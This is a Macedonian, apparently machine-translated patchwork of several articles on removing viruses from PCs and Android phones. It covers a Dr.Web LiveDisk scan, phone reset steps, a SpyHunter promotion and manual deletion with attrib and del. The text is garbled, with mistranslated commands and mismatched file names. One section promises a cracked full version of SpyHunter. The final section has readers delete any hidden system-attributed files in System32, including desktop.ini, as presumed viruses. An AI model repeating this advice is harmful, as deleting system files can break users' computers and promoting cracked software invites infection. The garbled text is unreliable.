Претпочитам да ја користам алатката Dr.Web LiveDisk. Kaspersky и другите водечки развивачи на безбедносни програми имаат слично решение, но јас сум повеќе навикнат да работам со оваа конкретна програма, па затоа ќе го прикажам целиот процес користејќи го неговиот пример.
Направете флеш диск со антивирус
Ќе ни треба празен флеш диск со капацитет од 1 GB или повеќе, или флеш диск со слободен простор од 1 GB.
Самата алатка Dr.Web LiveDisk може да се преземе од официјалната веб-страница.
Откако ќе се преземе датотеката, поврзете го флеш-уредот со вашиот компјутер и стартувајте ја преземената датотека.
Ова ќе започне програма што ќе ги открие сите достапни USB-уреди поврзани на вашиот компјутер. Ќе треба да изберете флеш-уред од списокот.
Алатката не ги брише датотеките од флеш-уредот, но обично го штиклирам полето што ви овозможува целосно да го форматирате флеш-уредот и да поставите само датотеки Dr.Web LiveDisk на него. Оваа опција ми се допаѓа повеќе, бидејќи за да го отстраните Dr.Web LiveDisk, сепак треба да го форматирате флеш-уредот. Затоа, полесно е веднаш привремено да ги префрлите датотеките што ви се потребни од него, да го форматирате USB флеш-уредот и да креирате Dr.Web LiveDisk. Кога повеќе не ви треба дискот за подигање, форматирајте го USB-флеш-уредот повторно и вратете ги сите датотеки во него.
Преземивме и инсталиравме антивирус со најновите антивирусни бази на податоци на USB флеш-уред. Ова значи дека ако сакате да го користите овој флеш диск по некое време, тогаш антивирусни бази на податоцивеќе застарена на неа.
Можно е да се ажурираат антивирусните бази на податоци без да се создаде нов флеш-уред, но јас обично не го правам тоа. Факт е дека ретко имам такви проблематични ситуации со вируси и полесно ми е повторно да создадам бутабилен USB флеш драјв со антивирус отколку да земам посебен флеш диск за овие цели и, доколку е потребно, да ги ажурирам базите на податоци за антивируси на тоа.
Како да го проверите вашиот компјутер за вируси
Значи, флеш-уредот е подготвен. Го рестартираме компјутерот и започнуваме од флеш-уредот.
За да го направите ова, можете да го користите менито за подигање (Мени за подигање). За различни производители на матични плочи и лаптопи, ова мени се повикува со притискање на различни копчиња на тастатурата, но обично тоа е или копчето Esc или едно од функционалните копчиња - F9, F11, F12. Најсигурниот начин да откриете кој клуч во вашиот случај го отвора менито за подигање е да се повикате на упатствата од вашиот лаптоп или матична плоча. Па, или уште полесно - прашајте го Yandex. За да го направите ова, ајде да формулираме барање за пребарување, на пример, "копче од менито за подигање лаптоп asus".
Ова копче мора да се притисне веднаш по вклучувањето на компјутерот. Обично не го држам копчето, туку само брзо и постојано го притискам додека не се појави менито.
Во менито, изберете го USB флеш-уредот и процесот на подигање започнува.
Стандардно поставено Англиски јазикинтерфејс, но можеме да ја поправиме ситуацијата со префрлување на руски со притискање на копчето F2 и избирање на јазикот.
За да изберете јазик, можете да ги користите копчињата на курсорот - стрелките нагоре и надолу. За да го потврдите изборот, притиснете го копчето ENTER.
Овој флеш драјв е целосно решениеза да ги решите сите видови проблеми, така што постои, на пример, алатка за тестирање на компјутерската меморија што можете да ја извршите токму сега. Но, јас ги користам стрелките за да го одберам Dr.Web LiveDisk и го притискам копчето ENTER.
Ќе се вчита оперативниот систем Линукс и Dr.Web CureIt! Истиот скенер може да се преземе и да работи од под Windows, но, како што реков претходно, многу е поправилно и поефикасно да се работи од USB флеш-уред отколку од оперативен систем вчитан од хард диск, па ајде да започнеме.
Можете да започнете брзо или да изберете приспособено скенирање, во кое можете да ги одредите објектите и областите на дискот што сакате да ги скенирате.
Ќе стартувам брз со кликнување на копчето „Започни проверка“.
По завршувањето на скенирањето, ќе добиеме информации за откриените закани и ќе можеме да ги неутрализираме со избирање на најсоодветното дејство - изберете објекти и кликнете на копчето "Defuse".
Ова беше најлесниот и најбрзиот начин за отстранување на вируси од компјутер.
Dr.Web CureIt! има поставки и ако сакате, можете да се запознаете со нив во упатствата, врската до која веќе ја дадов погоре.
Па, самиот флеш драјв Dr.Web LiveDisk е, како што веќе споменав, не само антивирусен скенер, туку цел сет на комунални услуги дизајнирани да ги вратат перформансите на компјутерот и неговата делумна дијагностика. Овде не само што можете да отстраните вируси, туку и да уредувате регистар на Windowsили работете со датотеки и папки на вашиот хард диск. Има и прелистувач со кој можете да ги добиете потребните информации од Интернет.
Таков флеш драјв постојано ме спасуваше и помогна да се вратам повеќе од еден компјутер ...
Зошто е твое мобилен телефонодеднаш почна да се однесува поинаку од вообичаеното, па дури и го „излечи“ својот „живот“? Можеби затоа што во него се населила злонамерна програма. Денес, бројот на вируси и тројанци за Android расте експоненцијално. Зошто? Да, затоа што итрите пишувачи на вируси знаат дека смартфоните и таблетите се почесто ги користат нашите сограѓани како електронски паричници и прават се за да ги префрлат средствата од сметките на сопствениците во нивните џебови. Ајде да разговараме за тоа како да разбереме дека мобилниот уред зафатил инфекција, како да отстраните вирус од Андроид и да се заштитите од повторна инфекција.
Симптоми на вирусна инфекција на уред со Android
- Гаџетот се вклучува подолго од вообичаеното, успорува или одеднаш се рестартира.
- Во историјата на СМС и телефонски повици, има појдовни пораки и повици што не сте ги оствариле.
- Парите сами се дебитираат од вашата телефонска сметка.
- Рекламите се појавуваат на работната површина или во прелистувачот што не се поврзани со ниту една апликација или локација.
- Програмите се инсталираат сами, Wi-Fi, Bluetooth или камера се вклучени.
- Изгубен пристап до електронски паричници, мобилно банкарство или од непознати причини сумата на сметките е намалена.
- Некој ја презел вашата сметка на социјалните мрежи или инстант-месинџери (ако се користи на мобилен уред).
- Гаџетот е блокиран, а на екранот се прикажува порака дека нешто сте прекршиле и мора да платите казна или едноставно да префрлите пари на некого за отклучување.
- Апликациите одеднаш престанаа да работат, пристапот до папките и датотеките е изгубен, сите функции на уредот беа блокирани (на пример, копчињата не се притиснати).
- Кога ќе ги стартувате програмите, се појавуваат пораки како „се појави грешка во апликацијата com.android.systemUI“.
- Во списокот со апликации се појавија непознати икони, а во менаџерот за задачи се појавија непознати процеси.
- Анти-вирусната програма ве информира за откривање на малициозни објекти.
- Анти-вирусната програма беше случајно избришана од уредот или не се вклучува.
- Батеријата на телефонот или таблетот ви се троши побрзо од вообичаено.
Не сите овие симптоми 100% укажуваат на вирус, но секој е причина веднаш да го скенирате вашиот уред за инфекција.
Најлесен начин да се отстрани мобилен вирус
Ако гаџетот продолжи да работи, најлесниот начин да се отстрани вирусот е со антивирусот инсталиран на Android. Извршете целосно скенирање на флеш меморијата на телефонот, ако се најде злонамерен објект, изберете ја опцијата „Избриши“, зачувувајќи ја неутрализираната копија во карантин (во случај антивирусот да помеша нешто безбедно за вирус).
За жал, овој метод помага во околу 30-40% од случаите, бидејќи повеќето малициозни објекти активно се спротивставуваат на нивното отстранување. Но, има контрола и врз нив. Следно, ќе ги разгледаме опциите за тоа кога:
- антивирусот не започнува, не го открива или отстранува изворот на проблемот;
- злонамерната програма е вратена по отстранувањето;
- уредот (или неговите индивидуални функции) е блокиран.
Отстранување на малициозен софтвер во безбеден режим
Ако не можете нормално да го исчистите телефонот или таблетот, обидете се да го користите безбедниот режим. Најголемиот дел од малициозните програми (не само мобилните) не покажуваат никаква активност во безбеден режим и не спречуваат уништување.
За да го подигнете уредот во безбеден режим, притиснете го копчето за вклучување/исклучување, ставете го прстот на „Power off“ и држете го додека не се појави пораката „Entering safe mode“. После тоа кликнете OK.
Ако имате стара верзијаАндроид - 4.0 и подолу, исклучете го гаџетот на вообичаен начин и вклучете го повторно. Кога логото на Android ќе се појави на екранот, истовремено притиснете ги копчињата за зголемување и намалување на јачината на звукот. Држете ги додека машината не се подигне целосно.
Додека сте во безбеден режим, скенирајте го вашиот уред со антивирус. Ако нема антивирус или не се стартува поради некоја причина, инсталирајте го (или повторно инсталирајте) од Google Play.
На овој начин успешно се отстрануваат рекламните вируси како Android.Gmobi 1 и Android.Gmobi.3 (според д-р веб класификација), кои преземаат различни програми на телефонот (со цел да се зголеми рејтингот), а исто така прикажуваат банери и реклами на работната површина.
Ако имате права на суперкорисник (root) и знаете што точно го предизвикало проблемот, стартувајте менаџер на датотеки(на пример, Root Explorer), следете ја патеката на локацијата на оваа датотека и избришете ја. Најчесто, мобилните вируси и тројанци ги ставаат своите тела (извршни датотеки со наставката .apk) во директориумот систем/апликација.
За да се префрлите во нормален режим, едноставно рестартирајте го уредот.
Отстранување на мобилни вируси преку компјутер
Отстранувањето на вируси на телефонот преку компјутер помага кога мобилниот антивирус не се справува со својата задача дури и во безбеден режим или функциите на уредот се делумно блокирани.
Исто така, можно е да се отстрани вирусот од таблет и телефон користејќи компјутер на два начина:
- користење на антивирус инсталиран на компјутер;
- рачно преку менаџер на датотеки за гаџети со Android, на пример, Android Commander.
Користење на антивирус на компјутер
За да скенирате датотеки на вашиот мобилен уред со инсталиран антивирус на вашиот компјутер, поврзете го телефонот или таблетот со компјутерот со USB-кабел, избирајќи го методот „Како USB-уред“.
Потоа вклучете USB.
После тоа, 2 дополнителни „дискови“ ќе се појават во папката „Компјутер“ на компјутерот - внатрешната меморија на телефонот и SD-картичката. За да започнете скенирање, отворете го контекстното мени на секој диск и кликнете на „Провери за вируси“.
Отстранување на малициозен софтвер со помош на Android Commander
Android Commander е програма за размена на датотеки помеѓу мобилен андроид гаџет и компјутер. Работејќи на компјутер, му овозможува на сопственикот пристап до меморијата на таблет или телефон, ви овозможува да копирате, преместувате и бришете какви било податоци.
За целосен пристап до сите содржини на гаџетот за Android, прво мора да ги добиете правата на root и да овозможите дебагирање преку USB. Вториот се активира преку услугата апликација "Поставки" - "Систем" - "Опции за програмери".
Следно, поврзете го гаџетот со компјутерот како USB-уред и стартувајте го Android Commander со администраторски права. Во него, за разлика од Windows Explorer, се прикажуваат заштитени системски датотеки и директориуми на Android OS - исто како, на пример, во Root Explorer - менаџер на датотеки за root корисници.
Десната половина од прозорецот Android Commander ги прикажува директориумите на мобилниот уред. Најдете ја извршната датотека на апликацијата (со наставката .apk) што го предизвикува проблемот во нив и избришете ја. Алтернативно, копирајте сомнителни папки од телефонот на вашиот компјутер и скенирајте ја секоја од нив со антивирус.
Што да направите ако вирусот не се отстрани
Ако горенаведените операции не доведоа до ништо, малициозниот софтвер сè уште се чувствува, а исто така и ако оперативниот систем престана да функционира нормално по чистењето, ќе мора да прибегнете кон една од радикалните мерки:
- ресетирање со враќање на фабричките поставки преку системското мени;
- тешко ресетирање преку мени за обновување;
- трепкање на уредот.
Било кој од овие методи ќе го доведе уредот во состојба како по купувањето - на него нема да има кориснички програми, лични поставки, датотеки и други информации (податоци за СМС, повици итн.). Вашата сметка исто така ќе биде избришана. Внес на Google. Затоа, ако е можно, префрлете го телефонскиот именик на SIM картичката и копирајте платени апликации и други вредни предмети на надворешни медиуми. Препорачливо е да го направите ова рачно - без употреба специјални програмиза случајно да не се копира вирусот. После тоа, продолжете со „третманот“.
Враќање на фабричките поставки преку системското мени
Оваа опција е најлесна. Може да се користи кога функциите на оперативниот систем и самиот уред не се блокирани.
Одете во апликацијата "Поставки", отворете го делот "Лични" - " Резервна копија“ и изберете „Ресетирање со фабрички поставки“.
Тешко ресетирање преку менито за обновување
„Тешкото“ ресетирање ќе помогне да се справите со малициозен софтвер ако не е отстранет со некој од горенаведените методи или го блокирал најавувањето. На наше задоволство, пристапот до менито Обнова (обновување на системот) е зачуван.
Вклучете се во Обнова различни телефониа таблетите се изведуваат на свој начин. Кај некои, треба да го држите копчето „Volume +“ кога го вклучувате, кај други - „Volume -“, кај други - притиснете специјално вдлабнато копче итн. Точните информации се содржани во упатствата за уредот.
Во менито Обнова, изберете ја опцијата „бришење податоци / фабричко ресетирање“ или едноставно „фабричко ресетирање“.
трепкање
Трепкањето во суштина е повторно инсталирање на оперативниот систем Android, истото последно средство како повторно инсталирање на Windows на компјутер. Се прибегнува кон исклучителни случаи, на пример, кога одреден кинески вирус е вграден директно во фирмверот и живее на уредот од моментот кога е „роден“. Еден таков малициозен софтвер е шпионски софтверАндроид шпион 128 потекло.
За да трепкате телефон или таблет, ќе ви требаат права за root, комплет за дистрибуција (самиот фирмвер), програма за инсталација, компјутер со USB-кабел или SD-картичка. Запомнете дека секој модел на гаџет има свои, индивидуални верзии на фирмверот. Тие обично доаѓаат со инструкции за инсталација.
Како да избегнете вирусна инфекција на уредите со Android
- Инсталирајте мобилни апликации само од доверливи извори, одбијте хакирани програми.
- Ажурирајте го вашиот уред додека се објавуваат системските ажурирања - во нив, програмерите ги затвораат пропустите што ги користат вирусите и тројанците.
- Инсталирајте мобилен антивирус и чувајте го секогаш вклучен.
- Ако гаџетот служи како ваш паричник, не дозволувајте други луѓе да пристапуваат на Интернет од него или да отвораат непроверени датотеки на него.
Отстранувањето на вирус од компјутер не е толку тешко како што често сликаат илјадници луѓе. Сите вируси се добро осмислени алгоритми на технички дејства. И ова значи дека можете да излечите која било злонамерна програма со примена на истиот правилен алгоритам, но со спротивен ефект.
И за ваша погодност, како и секогаш, предлагам да се запознаете со содржината на статијата и веднаш да отидете во поглавјето што ве интересира. Со среќа!
SpyHunter ќе ве спаси во такви ситуации.
На интернет има огромен број шпионски софтвери, тројанци кои можат да се „залепат“ за вашиот компјутер додека гледате каква било информација. Целта на ваквите апликации е да влезат во системот на кој било начин, да заменат некои од датотеките на вашиот компјутер. По успешна инсталација, вирусот почнува да го напаѓа системот. Ова се манифестира во многу различни ситуации, но најдобриот од малициозен софтвер ги спроведува своите активности целосно незабележано.
Во исто време, го користите вашиот компјутер секој ден без да се сомневате во ништо, внесувате најави и лозинки за да ги внесете вашите омилени сајтови или пошта. Во меѓувреме, вирусот работи и секој ден испраќа извештаи до својот сопственик за вашите сесии на Интернет. Внимателно ги филтрира информациите и ги испраќа сите зачувани и едноставно внесени лозинки.
Така, обичните корисници го губат пристапот до нивните страници на социјалните мрежи. мрежи, напорните работници ја губат својата пошта. Покрај тоа, многу често луѓето ја поврзуваат истата пошта со сите нивни сметки и хакерот, откако добил пристап до неа, едноставно бара враќање на лозинката за тоа од сите ваши страници и зема сè со што е „поврзана“ оваа пошта.
Па, програмата Spyhunter лесно ќе ги идентификува таквите штетници и ќе ви помогне да се ослободите од нив. Но, тоа не е сè што може да направи оваа апликација.
Дали некогаш сте се сретнале со реклами на Интернет, поточно реклами во вашите прелистувачи? Не мислам на безопасни реклами, кои обично се наоѓаат на рабовите на сајтовите и се само досадни некаде, но генерално не прават штета. Имено, рекламата која паѓа при првото отворање на прелистувачот и не може да се затвори, се отвора на сите сајтови неселективно и преинсталирањето на прелистувачот не спречува да се појавува повторно и повторно. Откако ќе ја прочитате статијата, ќе можете да се ослободите од таквите реклами еднаш засекогаш.
Сепак, постојат многу видови на напади на вируси, веројатно е невозможно да се заштитите од сите нив, но покажувајќи максимално внимание на безбедноста, можете да ја намалите веројатноста за појава на непотребно ѓубре на вашиот компјутер.
Мислам дека ја разбирате суштината и сте подготвени да продолжите кон практичното решавање на безбедносните проблеми. За да го направите ова, само продолжете да читате, сè ќе биде повеќе од јасно за само неколку минути.
Отстранување на вируси рачно или автоматски
За волја на вистината, сакам веднаш да кажам дека добар, сигурен производ не е бесплатен и официјално оваа програмаобезбедува негово користење со два алгоритма.
Во првиот случај, кој исто така е бесплатен, креаторите обезбедија можност за откривање на сите сомнителни и штетни програми на вашиот компјутер, но по откривањето, копчето „отстрани ги заканите“ нема да биде достапно и ќе мора да погледнете каде е проблемот е, влезете и рачно избришете ги штетните датотеки. Во принцип, сè е фер, ако го сакате бесплатно, збркајте и избришете сè сами, а програмата едноставно ќе покаже каде „седи“ вирусот. Во исто време, треба да се разбере дека Интернетот е моќен систем и во него секогаш можете да најдете веќе хакирана верзија на програмата, со целосно достапна функционалност.
Во вториот случај, исто така се плаќа, треба да платите за лиценца за користење на оваа програма, да одлучите што е поважно за вас погодност и време или заштеда на пари.
Но, ќе ви дадам можност бесплатно да инсталирате програма со целосна функционалност, за ова, погледнете го видеото на крајот од статијата, каде што ќе покажам и ќе кажам сè. И додека размислувате, преминете на следниот чекор.
Инсталирање на SpyHunter
Одиме на страницата на програмата spyhunter-4.com/ru/ адресата на страницата може малку да се разликува поради верзијата на програмата. За да инсталираме, го бараме копчето за преземање, во моментот на пишување, изгледаше вака:
По преземањето, инсталирајте ја програмата, ако имате какви било потешкотии со ова, само скролувајте до крајот на статијата, има видео упатство за инсталација и употреба, таму исто така можете да видите како да ја направите програмата потполно бесплатна и со целосна функционалност . По визуелен преглед на проблемите што дефинитивно нема да ги имате.
Упатство за употреба:
Откако ќе ја стартувате програмата, треба само да го започнете процесот на верификација, почекајте малку, сакам веднаш да кажам дека понекогаш верификацијата може да потрае неколку часа, во зависност од количината на информации на компјутерот и моќноста на вашиот компјутер. Ако погледнете во самата програма, таа изгледа вака: Отворете го табулаторот „Започни ново скенирање“, отштиклирајте го полето за брзо скенирање и притиснете го копчето за репродукција. Ајде да ја погледнеме сликата јасно.
Ја отстрануваме ознаката за брзо скенирање со причина. Ова е направено за да се постигне максимален ефект, затоа не заборавајте строго да ги следите упатствата за подоцна да не пишувате злонамерни коментари со кои не можете сами да се справите.
Вака ќе оди процесот на верификација:
А вака ќе изгледаат заканите, освен ако не ги имате:
На крајот од скенирањето, ќе го видите резултатот, каде што е означен бројот на закани и копчето за неутрализирање на заканите, изгледа вака:
Програмата SpyHunter има можност да додаде какви било програми во списокот со исклучувања за да не бидат фатени од апликацијата како недоверливи. Обично овој ефект се случува на програми што ги користите без лиценца (скршени, кракнати, непознати). Погледнете ја сликата за делот за исклучувања:
За да бидеме поточни, тогаш оние програми што вие самите дозволувате да ги прескокнете за време на проверката ќе бидат прикажани овде. Бидете внимателни и прескокнете ги само оние програми за чија сигурност сте сигурни најмалку 99%
Друга корисна категорија, „чувари на системот“ во неа, можете да видите што прави програмата, кои датотеки ги препознала како опасни и блокирани, а кои ги скенирала и одлучила дека се безбедни. Може да се каже дека ова е мал извештај, за ваша лична анализа и понатамошни одлуки, изгледа вака:
Функцијата за заштита на системот мора секогаш да биде овозможена за да се избегне инфекција и да се избегне контролата на блокираните програми. Се надевам дека ви ги пренесов моите размислувања што е можно поедноставно и покорисно, со нетрпение ги очекувам вашите коментари, секогаш ме интересира дали статијата се покажа како добра или е само збир на бескорисен текст за вас. Поставувајте ги вашите прашања и не бидете срамежливи, заедно можеме да се справиме со сите ситуации многукратно побрзо, со среќа пријатели!
Видео: Како да отстраните вирус од компјутер?
Не заборавајте да го оставите вашето мислење во коментарите, само на овој начин можеме да ја цениме универзалноста на методот за отстранување на вирусот.
без користење антивирусни програми
Овде ќе ви покажеме како можете самостојно да откриете и потоа да ги отстраните датотеките што можат сами да му наштетат на вашиот компјутер или вируси (рачно) без да користите никакви антивирусни програми.
Ова не е тешко. Да почнеме!
Како сами да го отстраните вирусот
Потребна е акција како администратор.
Прво треба да отворите командна линија. За да го направите ова, притиснете ја кратенката на тастатурата WINDOWS+Rи во прозорецот што се појавува во линијата внесете cmdи притиснете добро .
cmd команда во командната линија
Или со притискање на копчето Започнетево долниот лев агол на екранот на мониторот, во лентата за пребарување, почнете да пишувате " командна линија", а потоа кликнете со десното копче на пронајдениот резултат и изберете" Стартувај како администратор».
Повикување на командната линија преку пребарување
Извршете ја командната линија како администратор
Накратко за целите на нашите идни акции:
Со командата атрибуттреба да се најдат датотеки кои не треба да биде меѓу системските датотекии затоа може да биде сомнително.
Општо земено, во C:/погонне треба да содржи никакви .exeили .инфдатотеки. И тоа во папка C:\Windows\System32исто така, не смее да содржи други датотеки освен системски, скриени или само за читање датотеки со атрибути i, e S H R.
Значи, ајде да започнеме рачно пребарување за сомнителни датотеки, односно веројатни вируси, самостојно, без да користиме специјални програми.
Отворете ја командната линија и залепете cmd. Стартувај ја оваа датотека како администратор.
Отвораме cmd
Ние пишуваме во линија cd/за пристап до дискот. Потоа ја внесуваме командата атрибут. По секоја команда, не заборавајте да притиснете ENTER:
Тим атрибутна командната линија
Како што можете да видите од последната слика, датотеки со екстензии .exeили .инфне е откриен.
И еве пример со откриени сомнителни датотеки:
Вируси во системот Виндоус
C диск не содржи никакви датотеки .exe и.инф, Чао вие самите не ги поставувате овие датотеки рачно. Ако најдете некоја датотека како оние што ги најдовме и таа ќе се прикаже С Х Р, тогаш може да биде вирус.
Има 2 датотеки како оваа:
автоматско активирање.инф
sscv.exe
Овие датотеки имаат екстензии .exe и. инф и имаат атрибутиС Х Р . Така овие датотеки може да бидат вируси .
Сега бирајте attrib -s -h -g -a -i име на датотека.продолжување. Или во нашиот пример е:
атрибут-s-ж-Г -а -и автоматско активирање.инф
Оваа команда ќе ги промени нивните својства, правејќи ги нормални датотеки. Потоа тие можат да се отстранат.
За да ги отстраните овие датотеки, внесете делиме на датотека.продолжувањеили во нашиот случај:
del autorun.inf
Направете го истото со втората датотека:
Рачно отстранување на вируси
Сега да одиме во папкатасистем32.
Внесете cdпобеди*и притиснете ENTER.
Внесете повторно s систем32.Притиснете ENTER.
Потоа внесете ја командата атрибут. Притиснете ENTER.
Еве долга листа:
Повторно внесете ја командата подолу атрибутне заборавајте да притиснете подоцнаВнесете:
И ги наоѓаме овие датотеки:
Сомнителни датотеки во папката Windows
Кога се движите нагоре и надолу, екранот се движи многу брзо, па кога нешто ново трепка, паузирајте и вратете се назад, за да ја проверите секоја датотека без да пропуштите ниту една.
Сомнителни датотеки во папката Windows
Ги испишуваме сите пронајдени СХR датотеки:
- атр.инф
- dcr.exe
- десктоп.ini
- IDsev.exe
Извршете ја командата атрибут 3 или 4 пати за да бидете сигурни дека сте провериле сè.
Еве ти. Самостојно најдовме дури 4 малициозни датотеки! Сега треба да ги отстраниме овие 4 вируси.
C:\Windows\System32> attrib -s -h -r -a -i atr.inf
C:\Windows\System32> del atr.inf
C:\Windows\System32> attrib -s -h -r -a -i dcr.exe
C:\Windows\System32> deldcr.exe
C:\Windows\System32> attrih -s -h -r -a -i десктоп.ini
C:\Windows\\System32> del desktop.ini
C:\Windows\System32> attrib -s -h -r -a -i idsev.exe
C:\Windows\System32> del IDsev.exe
Сами ги отстрануваме вирусите од компјутерот
Слична операција мора да се изврши со други папки вгнездени во директориумот на Windows.
Треба да скенирате уште неколку директориуми како на пр Податоци за апликациии Темп. Користете команда атрибут, како што е прикажано во овој напис, и избришете ги сите датотеки со S H R атрибути кои не се поврзани со системски датотекии може да го зарази вашиот компјутер.